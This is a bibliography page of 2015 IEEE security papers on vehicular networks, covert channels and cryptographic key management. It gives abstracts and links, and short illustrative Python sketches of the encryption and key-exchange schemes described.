Abstract: It is estimated that the breakthrough in the broad deployment of the Internet of Things (IoT) could come from smart cars. Indeed, we have seen multi-faceted advances around cars: new materials, in-vehicle infotainment, driverless cars, smart transportation, electric vehicles, etc. However, in-vehicle networking has been mainly by wire, and the wiring for a car is largely pre-built during the design phase. With more and more things networked within a car, wiring has come to take up 1-2 percent of the total weight, which translates into burning up to 0.1 kilogram of fuel over 100 kilometers. On the other hand, advances in wireless technology, especially the broad acceptance of WirelessHART in industrial settings, have proved its capability in harsh environments. This paper studies what could happen if we use a WirelessHART mesh network for in-vehicle communication. While new wireless network protocols are needed to perform the task of CAN, the dominant in-vehicle fieldbus, WirelessHART could take on the work performed by LIN, the fieldbus for peripheral devices. A detailed study is provided to compare these buses. Road tests were performed in which a WirelessHART network kept running for a whole 20-minute period.

Keywords: Internet of Things; controller area networks; field buses; on-board communications; wireless mesh networks; CAN; Internet of Things; IoT; LIN; WirelessHART mesh network; driverless car; electrical vehicle; in-vehicle fieldbus; in-vehicle networking; smart car; vehicle infotainment; Communication system security; Protocols; Standards; Vehicles; Wireless communication; Wireless sensor networks; Wires; CAN; LIN; Reliable Wireless Sensor Network; Smart Car; WirelessHART (ID#: 16-9242)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336304&isnumber=7336120

 

Ahmed, K.J.; Lee, M.J.; Jie Li, "Layered Scalable WAVE Security for VANET," in Military Communications Conference, MILCOM 2015 - 2015 IEEE, pp. 1566-1571, 26-28 Oct. 2015. doi: 10.1109/MILCOM.2015.7357668

Abstract: We propose a layered and scalable WAVE (Wireless Access for Vehicular Environments) security structure for VANET (Vehicular Ad hoc Network). Scalability and variable message delivery are provided by using both asymmetric and symmetric encryption algorithms. The whole region is divided into different security domains, and the security-related load of each domain is distributed evenly. At the top, the Regional Transportation Authority (RTA) generates keys and stores information about the Master and Edge RSUs (MRSU/ERSU), which in turn store the keys and information of the RSUs. The MRSU/ERSU also provide the pseudonym seeds and store information about vehicles. An RSU is used only as an access point for contacting the transportation authority or accessing the Internet. High-priority emergency message delivery is expedited by using symmetric key cryptography. Simulation comparisons show that our scheme also provides significantly improved network throughput without compromising security goals.

Keywords: Internet; public key cryptography; telecommunication security; vehicular ad hoc networks; ERSU; Internet; MRSU; RTA; Regional Transportation Authority; VANET network; access point; asymmetric encryption algorithm; edge RSU; information storage; key generation; layered scalable WAVE security structure; master RSU; network throughput improvement; pseudonym seeds; scalability message delivery; security related load; symmetric encryption algorithm; symmetric key cryptography; variable message delivery; vehicular ad hoc network; wireless access for vehicular environments; Privacy; Protocols; Public key; Scalability; Vehicles; Vehicular ad hoc networks; Mobile ad hoc network; Security; VANET; privacy; trust (ID#: 16-9243)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7357668&isnumber=7357245

 

Sharma, M.K.; Kaur, A., "A Survey on Vehicular Cloud Computing and its Security," in Next Generation Computing Technologies (NGCT), 2015 1st International Conference on, pp. 67-71, 4-5 Sept. 2015. doi: 10.1109/NGCT.2015.7375084

Abstract: Vehicular networking has significant advantages in today's era. It provides desirable features and specific applications such as efficient traffic management, road safety, and infotainment. Vehicles carry a growing set of communication and computing systems, such as on-board computing devices, storage, computing power, GPS, etc., to support Intelligent Transportation Systems (ITS). A new hybrid technology known as Vehicular Cloud Computing (VCC) has great impact on ITS by using vehicle resources such as GPS, storage, Internet connectivity, and computing power for instant decision making and sharing information on the cloud. This paper not only presents the concept of the vehicular cloud but also provides a brief overview of the applications, security issues, threats, and security solutions for VCC.

Keywords: cloud computing; decision making; intelligent transportation systems; security of data; vehicular ad hoc networks; ITS; VCC; communication systems; computing power; information sharing; instant decision making; intelligent transportation system; on-board computing device; road safety; security issues; traffic management; vehicular cloud computing; vehicular networking; Cloud computing; Global Positioning System; Roads; Security; Sensors; Vehicles; Intelligent Transportation System; Vehicular Ad hoc Networks; Vehicular Cloud; Vehicular Cloud Computing; Vehicular Cloud Security (ID#: 16-9244)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7375084&isnumber=7375067

 

Mundhenk, P.; Steinhorst, S.; Lukasiewycz, M.; Fahmy, S.A.; Chakraborty, S., "Lightweight Authentication for Secure Automotive Networks," in Design, Automation & Test in Europe Conference & Exhibition (DATE), 2015, pp. 285-288, 9-13 March 2015. Doi:  (not provided)

Abstract: We propose a framework to bridge the gap between secure authentication in automotive networks and on the internet. Our proposed framework allows runtime key exchanges with minimal overhead for resource-constrained in-vehicle networks. It combines symmetric and asymmetric cryptography to establish secure communication and enable secure updates of keys and software throughout the lifetime of the vehicle. For this purpose, we tailor authentication protocols for devices and authorization protocols for streams to the automotive domain. As a result, our framework natively supports multicast and broadcast communication. We show that our lightweight framework is able to initiate secure message streams fast enough to meet the real-time requirements of automotive networks.

Keywords: Internet; authorisation; automobiles; computer network security; cryptographic protocols; Internet; asymmetric cryptography; authentication protocols; authorization protocols; broadcast communication; lightweight authentication; multicast communication; resource-constrained in-vehicle networks; runtime key exchanges; secure authentication; secure automotive networks; secure message streams; Authentication; Authorization; Automotive engineering; Encryption; Vehicles (ID#: 16-9245)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7092398&isnumber=7092347
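
The combination the abstract describes, asymmetric cryptography for key establishment and symmetric cryptography for the message streams, follows a standard pattern that can be sketched as below. This is the generic pattern under stated assumptions, not the authors' protocol; it uses the Python `cryptography` package, and the stream and message names are invented.

```python
# Generic hybrid pattern (not the authors' protocol): an RSA key exchange
# wraps a fresh symmetric session key once; the message stream then uses fast
# AES-GCM authenticated encryption.
import os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

# Setup phase: the receiving ECU's public key wraps the session key.
ecu_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
session_key = AESGCM.generate_key(bit_length=128)
oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)
wrapped = ecu_key.public_key().encrypt(session_key, oaep)   # sent once
session_key_rx = ecu_key.decrypt(wrapped, oaep)             # receiver unwraps

# Stream phase: each frame is authenticated-encrypted under the session key.
aead = AESGCM(session_key_rx)
nonce = os.urandom(12)
frame = aead.encrypt(nonce, b"brake status: ok", b"stream-42")
print(aead.decrypt(nonce, frame, b"stream-42"))             # b'brake status: ok'
```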

 

Singla, A.; Mudgerikar, A.; Papapanagiotou, I.; Yavuz, A.A., "HAA: Hardware-Accelerated Authentication for Internet of Things in Mission Critical Vehicular Networks," in Military Communications Conference, MILCOM 2015 - 2015 IEEE, pp. 1298-1304, 26-28 Oct. 2015. doi: 10.1109/MILCOM.2015.7357624

Abstract: Modern vehicles are being equipped with advanced sensing and communication technologies, which enable them to connect to surrounding entities. In military vehicular networks, it is vital to prevent adversaries from manipulating critical messages via cryptographic protection (e.g., digital signatures) while at the same time minimizing the impact introduced by crypto operations (e.g., delay). Hence, their communication must be delay-aware, scalable, and secure. In this paper, we developed Hardware-Accelerated Authentication (HAA), which enables the practical realization of delay-aware signatures for vehicular networks. Specifically, we developed a cryptographic hardware-acceleration framework for Rapid Authentication (RA) [1], a delay-aware offline-online signature scheme for command and control systems. We showed that HAA can significantly improve the performance of offline-online constructions under high message throughput, an important property for vehicular networks. HAA-2048 (GPU) is 18x, 6x, and 3x faster than the current CPU implementations of RSA, ECDSA, and RA, respectively, at the same level of security.

Keywords: Internet of Things; message authentication; microprocessor chips; military communication; military computing; public key cryptography; vehicular ad hoc networks; CPU implementation; ECDSA; GPU; HAA; HAA-2048; Internet of Things; RA; RSA; advanced sensing and communication technologies; command and control system; critical message manipulation; crypto operation; cryptographic hardware-acceleration framework; cryptographic protection; delay-aware offline-online signature scheme; hardware-accelerated authentication; high message throughput; military vehicular network; mission critical vehicular network; rapid authentication; Acceleration; Authentication; Cryptography; Delays; Graphics processing units; Throughput; Authentication; digital signatures; hardware-acceleration; vehicular networks (ID#: 16-9246)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7357624&isnumber=7357245

 

Singh, A.; Gupta, R.; Rastogi, R., "A Novel Approach for Vehicle Tracking System for Traffic Jam Problem," in Computing for Sustainable Global Development (INDIACom), 2015 2nd International Conference on, pp. 169-174, 11-13 March 2015. Doi:  (not provided)

Abstract: This research paper focuses on the sensitive issue of traffic jams on roads, which often lead to problems such as missing an important meeting or appointment, missing scheduled trains, getting late for school or college, or sometimes conflicts among people. This paper tries to address the problem by tracking its root cause, i.e., the movement of vehicles on roads, and predicting the further path to be traced with the help of the widely used tool GPS. This can also prove helpful in avoiding crimes like kidnapping and in improving women's security, keeping in mind the present scenario of society in which heinous crimes like the Damini rape case take place. We are living in the twenty-first century, a century in which we plan to achieve ever more precision, faster computation, and increased luxury. In the coming years, the number of cars on the road will of course increase, making roads more prone to traffic jams and blurring our vision of a faster and more precise world. This paper deals with the present scenario and a practical approach to minimizing the problem. It also offers further advantages, such as the security of women and easier access to transport for waiting passengers.

Keywords: road traffic; road vehicles; tracking; traffic engineering computing; GPS; traffic jam problem; vehicle tracking system; Global Positioning System; Internet; Microcontrollers; Roads; Security; Servers; Vehicles; GPS; Traffic jam; google maps; tracking of vehicles (ID#: 16-9247)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7100240&isnumber=7100186

 

Mayer, S.; Siegel, J., "Conversations with Connected Vehicles," in Internet of Things (IOT), 2015 5th International Conference on the, pp. 38-44, 26-28 Oct. 2015. doi: 10.1109/IOT.2015.7356546

Abstract: We present a system that allows drivers and fleet managers to interact with their connected vehicles both by means of direct control and indirect goal-setting. The ability to move data from vehicles to a remote server is established by the flexible and secure open vehicle telematics platform “CloudThink.” Based on this platform, we present several prototypes of how people can be enabled to conveniently interact with connected vehicles: First, we demonstrate a system that allows users to select and interact with vehicles using object recognition methods and automatically generated user interfaces on smartphones or personal wearable devices. Second, we show how functional semantic metadata can be used to smooth the boundaries for interacting with vehicles in the physical and virtual worlds. Finally, we present a method for monitoring interactions between vehicles and remote services which increases safety and security by enhancing driver oversight and control over the data that leaves and enters their vehicle.

Keywords: cloud computing; meta data; mobile computing; object recognition; radiotelemetry; semantic Web; smart phones; telecommunication security; user interfaces; vehicular ad hoc networks; CloudThink; functional semantic metadata; object recognition method; personal wearable device; remote server; remote service; smartphone; telematics platform; user interface; Automobiles; Cloud computing; Connected vehicles; Hardware; Logic gates; Servers (ID#: 16-9248)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7356546&isnumber=7356538

 

Yang Yang; Vlajic, N.; Nguyen, U.T., "Next Generation of Impersonator Bots: Mimicking Human Browsing on Previously Unvisited Sites," in Cyber Security and Cloud Computing (CSCloud), 2015 IEEE 2nd International Conference on, pp. 356-361, 3-5 Nov. 2015. doi: 10.1109/CSCloud.2015.93

Abstract: The development of Web bots capable of exhibiting human-like browsing behavior has long been the goal of practitioners on both sides of the security spectrum - malicious hackers as well as security defenders. For malicious hackers, such bots are an effective vehicle for bypassing various layers of system/network protection or for obstructing the operation of Intrusion Detection Systems (IDSs). For security defenders, human-like behaving bots are shown to be of great importance in the process of system/network provisioning and testing. In the past, there have been many attempts at developing accurate models of human-like browsing behavior. However, most of these attempts/models suffer from one of the following drawbacks: they either require that some previous history of actual human browsing on the target web-site be available (which often is not the case), or they assume that 'think times' and 'page popularities' follow the well-known Poisson and Zipf distributions (an old hypothesis that does not hold well in the modern-day WWW). To our knowledge, our work is the first attempt at developing a model of human-like browsing behavior that requires no prior knowledge or assumptions about human behavior on the target site. The model is founded on a more general theory that defines human behavior as an 'interest-driven' process. The preliminary simulation results are very encouraging - web bots built using our model are capable of mimicking real human browsing behavior 1000-fold better than bots that deploy a random crawling strategy.

Keywords: Internet; Poisson distribution; Web sites; computer crime; invasive software; IDS; Poisson distribution; Web bots; Web-site; Zipf distribution; human behavior; human browsing behavior; human-like behaving bots; human-like browsing behavior; impersonator bot; intrusion detection system; network protection; next generation; random crawling strategy; security defender; security spectrum-malicious hacker; system protection; unvisited site; Computer hacking; History; Internet; Predictive models; Web pages; bot modeling; interest-driven human browsing (ID#: 16-9249)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7371507&isnumber=7371418

 

Mejri, M.N.; Hamdi, M., "Recent Advances in Cryptographic Solutions for Vehicular Networks," in Networks, Computers and Communications (ISNCC), 2015 International Symposium on, pp. 1-7, 13-15 May 2015. doi: 10.1109/ISNCC.2015.7238573

Abstract: As vehicles become increasingly intelligent, it is expected that in the near future they will be equipped with radio interfaces. This will enable the formation of vehicular networks, commonly referred to as VANETs, an instance of mobile ad hoc networks with cars as the mobile nodes. As VANETs exhibit several unique features (e.g. high mobility of nodes, geographic extension) traditional security mechanisms are not always applicable. Consequently, a plethora of research contributions have been presented to cope with the intrinsic characteristics of vehicular communication. This paper outlines the communication architecture of VANETs and discusses the security and privacy challenges that need to be overcome to make such networks practically viable. It compares the various cryptographic schemes that were suggested for VANETs and explores some future trends that will shape the research in cryptographic protocols for intelligent transportation systems.

Keywords: cryptographic protocols; intelligent transportation systems; vehicular ad hoc networks; VANET; communication architecture; cryptographic protocols; intelligent transportation systems; intrinsic characteristics; mobile ad hoc networks; privacy challenges; radio interfaces; security challenges; vehicular ad hoc networks; Authentication; Cryptography; Internet; Vehicles; Vehicular ad hoc networks; Wireless communication; Attacks; Cryptographic algorithms; IEEE 802.11p; Security requirements; Vehicular Ad hoc Networks (VANETs) (ID#: 16-9250)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7238573&isnumber=7238567

 

Dakhane, D.M.; Deshmukh, P.R., "Active Warden for TCP Sequence Number Base Covert Channel," in Pervasive Computing (ICPC), 2015 International Conference on, pp. 1-5, 8-10 Jan. 2015. doi: 10.1109/PERVASIVE.2015.7087183

Abstract: Network covert channels are generally used to leak information by violating security policies. They allow an attacker to send as well as receive secret information without being detected by the network administrator or warden in the network. There are several ways to implement such covert channels, notably storage covert channels and timing covert channels. However, there is always some possibility of these covert channels being identified depending on their behaviour. In this paper, we propose an active warden, which normalizes incoming and outgoing network traffic to eliminate all possible storage-based covert channels. It is specially designed for the TCP sequence number field because this field is the maximum-capacity vehicle for storage-based covert channels. Our experimental results show that the proposed active warden model eliminates up to 99% of covert communication, while overt communication remains intact.

Keywords: transport protocols; TCP sequence number base covert channel; maximum capacity vehicle; security policies; storage covert channel; timing covert channel; IP networks; Internet; Kernel; Protocols; Security; Telecommunication traffic; Timing; Active Warden; Network Covert Channels; Storage Covert Channels; TCP Headers; TCP ISN; TCP Sequence Number; TCP-SQN; TCP/IP (ID#: 16-9251)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7087183&isnumber=7086957
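
The core of an active warden for this channel is traffic normalization: replace every initial sequence number (ISN) with a clean random value and shift the rest of the stream by the same offset, so any data hidden in the ISN is destroyed while the overt connection survives. The minimal sketch below illustrates that bookkeeping; the connection identifiers and packet handling are simplified assumptions, not the authors' implementation.

    import random

    class IsnNormalizer:
        def __init__(self):
            self.offsets = {}   # (src, dst, sport, dport) -> sequence offset

        def rewrite_seq(self, conn_id, seq, is_syn):
            if is_syn:
                # overwrite the possibly covert ISN with a fresh random one
                clean_isn = random.getrandbits(32)
                self.offsets[conn_id] = (clean_isn - seq) % 2**32
            # shift later sequence numbers by the same per-connection offset
            # (assumes the SYN of this connection was seen first)
            return (seq + self.offsets[conn_id]) % 2**32

    w = IsnNormalizer()
    print(w.rewrite_seq(("10.0.0.1", "10.0.0.2", 4444, 80), 1337, is_syn=True))

A complete warden would also apply the inverse offset to acknowledgement numbers on the return path so that both endpoints stay consistent.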

 

Sharma, M.K.; Bali, R.S.; Kaur, A., "Dynamic Key Based Authentication Scheme for Vehicular Cloud Computing," in Green Computing and Internet of Things (ICGCIoT), 2015 International Conference on, pp. 1059-1064, 8-10 Oct. 2015. doi: 10.1109/ICGCIoT.2015.7380620

Abstract: In recent years, Vehicular Cloud Computing (VCC) has emerged as a new technology to provide uninterrupted information to vehicles from anywhere, at any time. VCC provides two types of services to users: safety-related messages and non-safety-related messages. Vehicles have limited computational power, storage, etc., so they collect information and send it to the local or vehicular cloud for computation or storage purposes. But due to the dynamic nature of the network, rapid topology changes and the open communication medium, the information can be altered, which leads to misguided users, wrong information sharing, etc. In the proposed scheme, Elliptic Curve Cryptography is used for secure communication in the network, which also ensures security requirements such as confidentiality, integrity and privacy. The proposed scheme ensures the mutual authentication of both the sender and the receiver that want to communicate. The scheme uses additional operations, such as a one-way hash function and concatenation, to secure the network against various attacks, e.g. spoofing, man-in-the-middle and replay attacks. The effectiveness of the proposed scheme is evaluated using metrics such as packet delivery ratio, throughput and end-to-end delay, and it is found to perform better than a network where the scheme is not applied.

Keywords: automobiles; cloud computing; intelligent transportation systems; public key cryptography; vehicular ad hoc networks; VCC; dynamic key-based authentication scheme; elliptic curve cryptography; mutual authentication; open communication medium; vehicular cloud computing; Authentication; Cloud computing; Elliptic curve cryptography; Elliptic curves; Receivers; Vehicles; Intelligent Transportation System; Key Authentication; Key Generation; VANET's; Vehicular Cloud Computing (ID#: 16-9252)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7380620&isnumber=7380415


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


 

Key Management 2015

 

 
SoS Logo

Key Management 2015

 

Successful key management is critical to the security of any cryptosystem. It is perhaps the most difficult part of cryptography, encompassing system policy, user training, organizational and departmental interactions, and coordination among all of these elements. It also covers the generation, exchange, storage, use, and replacement of keys, key servers, cryptographic protocols, and user procedures. For researchers, key management is a challenge to create larger scale and faster systems that operate within the cloud and other complex environments, while ensuring validity and not adding weight to the process.  For the Science of Security community, it is relevant to scalability, resilience, metrics, and human behavior.  The work cited here was presented in 2015.


Sharma, S.; Krishna, C.R., "An Efficient Distributed Group Key Management Using Hierarchical Approach with Elliptic Curve Cryptography," in Computational Intelligence & Communication Technology (CICT), 2015 IEEE International Conference on, pp. 687-693, 13-14 Feb. 2015. doi: 10.1109/CICT.2015.116

Abstract: Secure and reliable group communication is an active area of research. Its popularity is fueled by the growing importance of group-oriented and collaborative applications. The central research challenge is secure and efficient group key management. In this paper, we propose an efficient many-to-many group key management protocol for distributed group communication. This protocol is based on Elliptic Curve Cryptography and decreases the key length while providing the same level of security as other cryptosystems. The main issues in secure group communication are group dynamics and key management. A scalable secure group communication model ensures that whenever there is a membership change, a new group key is computed and distributed to the group members with minimal communication and computation cost. This paper explores the use of batching of group membership changes to reduce the time and key re-distribution operations. The features of the ECC protocol are that no keys are exchanged between existing members at join, and only one key, the group key, is delivered to the remaining members at leave. In the security analysis, our proposed algorithm takes less time when users join or leave the group in comparison to existing ones. In ECC, there is only one key generation and key encryption overhead at the join and leave operations. At join, the communication overhead is the key size of one node; at leave, it is (2 log2 n - 2) x the key size of a node.

Keywords: cryptographic protocols; public key cryptography; ECC protocol; collaborative properties; cryptosystems; distributed group communication; distributed group key management; elliptic curve cryptography; group dynamics; group membership; group-oriented properties; hierarchical approach; key encryption overhead; key redistribution operations; many-to-many group key management protocol; scalable secure group communication model; security analysis; Binary codes; Elliptic curve cryptography; Encryption; Protocols; Distributed Group Key Management; Group Communication; Hierarchical Group Key Management (ID#: 16-9354)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7078791&isnumber=7078645
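
The leave cost quoted at the end of the abstract is the standard logical-key-tree count: each of the roughly log2 n keys on the leaving member's path to the root is replaced, and each replacement is encrypted for the two subtrees beneath it. A small sketch of that counting, under the usual assumption of a balanced binary tree (which may differ in detail from the paper's exact structure):

    import math

    def leave_rekey_cost(n):
        # keys on the leaf-to-root path that must be refreshed
        depth = math.ceil(math.log2(n))
        # each refreshed key is sent encrypted under its two children,
        # except at the bottom of the path, giving 2*log2(n) - 2 messages
        return 2 * depth - 2

    for n in (8, 64, 1024):
        print(f"{n} members -> {leave_rekey_cost(n)} encrypted keys at leave")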

 

Benmalek, M.; Challal, Y., "eSKAMI: Efficient and Scalable Multi-group Key Management for Advanced Metering Infrastructure in Smart Grid," in Trustcom/BigDataSE/ISPA, 2015 IEEE, vol. 1, pp. 782-789, 20-22 Aug. 2015. doi: 10.1109/Trustcom.2015.447

Abstract: Advanced Metering Infrastructure (AMI) is composed of systems and networks for measuring, collecting, storing, analyzing, and exploiting energy usage related data. AMI is an enabling technology for the Smart Grid (SG) and hence represents a privileged target for security attacks with potentially great damage against infrastructures and privacy. For this reason, security has been identified as one of the most challenging topics in AMI development, and designing an efficient Key Management Scheme (KMS) is one of the first important steps. In this paper, we propose a new scalable and efficient key management scheme that we call Efficient and Scalable multi-group Key Management for AMI (eSKAMI) to secure data communications in an Advanced Metering Infrastructure. It is a key management scheme that can support unicast, multicast and broadcast communications based on an efficient Multi-group Key graph technique. An analysis of security and performance, and a comparison of our scheme with recently proposed schemes, show that our KMS induces low storage overhead compared to existing solutions (the reduction reaches 83%) without increasing the communication overhead.

Keywords: graph theory; smart power grids; telecommunication network management; telecommunication security; AMI development; KMS; SG; Smart Grid; advanced metering infrastructure; eSKAMI; efficient and scalable multigroup key management; efficient key management scheme; energy usage; multigroup key graph technique; privacy; scalable multigroup key management; secure data communications; security attacks; Authentication; Cryptography; Load management; Smart grids; Smart meters; Unicast; Advanced Metering Infrastructure (AMI); Key Management Scheme (KMS); Security; Smart Grid (SG) (ID#: 16-9355)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7345355&isnumber=7345233

 

Zhang Ying; Zheng Bingxin, "A Multiple Key Management Method in Distributed Sensor Networks," in Control Conference (CCC), 2015 34th Chinese, pp. 7676-7681, 28-30 July 2015. doi: 10.1109/ChiCC.2015.7260858

Abstract: Wireless sensor networks (WSNs) with a mobile sink node (MS) have attracted wide attention. In view of the low security of the basic random key pre-distribution scheme, and the vital role of the MS in key management research, this paper proposes a new scheme (the PPBR scheme) based on a composite key management approach that combines polynomial pool-based key pre-distribution with basic random key pre-distribution. The scheme uses the degree-t property of polynomials to increase the difficulty of cracking keys and to enhance network resilience against node capture; meanwhile, it improves storage efficiency by exploiting the heterogeneity between the MS and the sensor nodes. Low connectivity is addressed by introducing a path-key tree-based establishment method. Theoretical analysis and simulation experiments show that the proposed scheme has advantages in terms of network security, connectivity and storage effectiveness under comprehensive consideration of different performance evaluations.

Keywords: polynomials; telecommunication network management; telecommunication security; wireless sensor networks; MS; PPBR scheme; WSN; basic random key predistribution; composite key management schemes; distributed sensor networks; mobile sink node; multiple key management method; network resilience; polynomial pool; polynomial t-degree property; security; wireless sensor network; Mobile sink; composite scheme; heterogeneous networks; key management (ID#: 16-9356)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7260858&isnumber=7259602
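
Polynomial pool-based pre-distribution rests on symmetric bivariate polynomials over a finite field: since f(x, y) = f(y, x), node i can store the univariate share f(i, y) and later agree on the pairwise key f(i, j) = f(j, i) with any node j holding a share of the same polynomial. A toy instance with degree t = 2 and a deliberately small prime follows; a real scheme draws polynomials from a pool over a much larger field.

    P = 8191   # toy prime field (2^13 - 1); real schemes use far larger primes
    # symmetric coefficient matrix, C[a][b] == C[b][a], of
    # f(x, y) = sum over a, b of C[a][b] * x^a * y^b
    C = [[5, 7, 11],
         [7, 3, 2],
         [11, 2, 9]]

    def share(i):
        # share stored by node i: coefficients of g_i(y) = f(i, y)
        return [sum(C[a][b] * pow(i, a, P) for a in range(3)) % P
                for b in range(3)]

    def pairwise_key(my_share, peer_id):
        # evaluate g_i(peer_id) = f(i, peer_id)
        return sum(my_share[b] * pow(peer_id, b, P) for b in range(3)) % P

    assert pairwise_key(share(17), 42) == pairwise_key(share(42), 17)

An adversary must capture more than t shares of the same polynomial to reconstruct it, which is the resilience-versus-storage trade-off such schemes tune.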

 

Yukun Zhou; Dan Feng; Wen Xia; Min Fu; Fangting Huang; Yucheng Zhang; Chunguang Li, "Secdep: A User-Aware Efficient Fine-Grained Secure Deduplication Scheme with Multi-Level Key Management," in Mass Storage Systems and Technologies (MSST), 2015 31st Symposium on, pp. 1-14, May 30 2015-June 5 2015. doi: 10.1109/MSST.2015.7208297

Abstract: Nowadays, many customers and enterprises backup their data to cloud storage that performs deduplication to save storage space and network bandwidth. Hence, how to perform secure deduplication becomes a critical challenge for cloud storage. According to our analysis, the state-of-the-art secure deduplication methods are not suitable for cross-user fine-grained data deduplication. They either suffer from brute-force attacks that can recover files falling into a known set, or incur large computation (time) overheads. Moreover, existing approaches to convergent key management incur large space overheads because of the huge number of chunks shared among users. Our observation that cross-user redundant data are mainly from duplicate files motivates us to propose an efficient secure deduplication scheme, SecDep. SecDep employs User-Aware Convergent Encryption (UACE) and Multi-Level Key management (MLK) approaches. (1) UACE combines cross-user file-level and inside-user chunk-level deduplication, and exploits different security policies among and inside users to minimize the computation overheads. Specifically, both file-level and chunk-level deduplication use variants of Convergent Encryption (CE) to resist brute-force attacks. The major difference is that the file-level CE keys are generated using a server-aided method to ensure the security of cross-user deduplication, while the chunk-level keys are generated using a user-aided method with lower computation overheads. (2) To reduce key space overheads, MLK uses the file-level key to encrypt chunk-level keys so that the key space will not increase with the number of sharing users. Furthermore, MLK splits the file-level keys into share-level keys and distributes them to multiple key servers to ensure the security and reliability of file-level keys. Our security analysis demonstrates that SecDep ensures data confidentiality and key security. Our experimental results based on several large real-world datasets show that SecDep is more time-efficient and key-space-efficient than the state-of-the-art secure deduplication approaches.

Keywords: cloud computing; cryptography; data privacy; MLK approaches; SecDep; UACE; brute-force attacks; cloud storage; computation overheads; cross-user deduplication security; cross-user file-level deduplication; cross-user finegrained data deduplication; data confidentiality; inside-user chunk-level deduplication; key security; key space overhead reduction; multilevel key management approaches; security analysis; server-aided method; user-aided method; user-aware convergent encryption; user-aware efficient fine-grained secure deduplication scheme; Encryption; Protocols; Resists; Servers (ID#: 16-9357)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7208297&isnumber=7208272
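
Convergent encryption (CE), the primitive behind SecDep's UACE variants, derives the key from the content itself, so identical chunks produce identical ciphertexts and can be deduplicated without exposing plaintext. A minimal sketch using the widely available `cryptography` package follows; the deterministic nonce derivation is an illustrative assumption, and SecDep's server- and user-aided key generation is deliberately more involved.

    from hashlib import sha256
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM

    def convergent_encrypt(chunk: bytes) -> bytes:
        key = sha256(chunk).digest()                       # key derived from content
        nonce = sha256(b"ce-nonce" + chunk).digest()[:12]  # deterministic nonce
        # identical chunks -> identical ciphertexts, enabling deduplication
        return AESGCM(key).encrypt(nonce, chunk, None)

    assert convergent_encrypt(b"same chunk") == convergent_encrypt(b"same chunk")

This determinism is also why plain CE is brute-forceable for predictable content, the very weakness the paper's server-aided file-level keys are meant to counter.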

 

Shuaiqi Hu, "A Hierarchical Key Management Scheme for Wireless Sensor Networks Based on Identity-Based Encryption," in Computer and Communications (ICCC), 2015 IEEE International Conference on, pp. 384-389, 10-11 Oct. 2015. doi: 10.1109/CompComm.2015.7387601

Abstract: Limited resources (such as energy, computing power, storage, and so on) make it impractical for wireless sensor networks (WSNs) to deploy traditional security schemes. In this paper, a hierarchical key management scheme is proposed on the basis of identity-based encryption (IBE). The proposed scheme not only converts the distributed flat architecture of WSNs to a hierarchical architecture for better network management but also ensures the independence and security of the sub-networks. This paper first reviews identity-based encryption, particularly the Boneh-Franklin algorithm. Then a novel hierarchical key management scheme based on the basic Boneh-Franklin and Diffie-Hellman (DH) algorithms is proposed. Finally, the security and efficiency of our scheme are discussed by comparison with other identity-based schemes for the flat architecture of WSNs.

Keywords: cryptography; telecommunication network management; telecommunication security; wireless sensor networks; Boneh-Franklin algorithm; Boneh-Franklin algorithms; Diffie-Hellman algorithms; WSN; hierarchical key management scheme; identity-based encryption; identity-based schemes; network management; security; wireless sensor networks; Base stations; Computer architecture; Encryption; Identity-based encryption; Wireless sensor networks; Diffie-Hellman key exchange; IBE; WSNs; key management (ID#: 16-9358)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7387601&isnumber=7387523
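
The Diffie-Hellman exchange used alongside Boneh-Franklin can be shown with textbook toy parameters; real deployments use large primes or elliptic-curve groups.

    import secrets

    p, g = 23, 5                       # classic textbook group; far too small for real use
    a = secrets.randbelow(p - 2) + 1   # private value of node A
    b = secrets.randbelow(p - 2) + 1   # private value of node B
    A, B = pow(g, a, p), pow(g, b, p)  # public values exchanged in the clear
    assert pow(B, a, p) == pow(A, b, p)   # both sides compute g^(ab) mod p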

 

Abdmeziem, M.R.; Tandjaoui, D.; Romdhani, I., "A Decentralized Batch-Based Group Key Management Protocol for Mobile Internet of Things (DBGK)," in Computer and Information Technology; Ubiquitous Computing and Communications; Dependable, Autonomic and Secure Computing; Pervasive Intelligence and Computing (CIT/IUCC/DASC/PICOM), 2015 IEEE International Conference on, pp. 1109-1117, 26-28 Oct. 2015. doi: 10.1109/CIT/IUCC/DASC/PICOM.2015.166

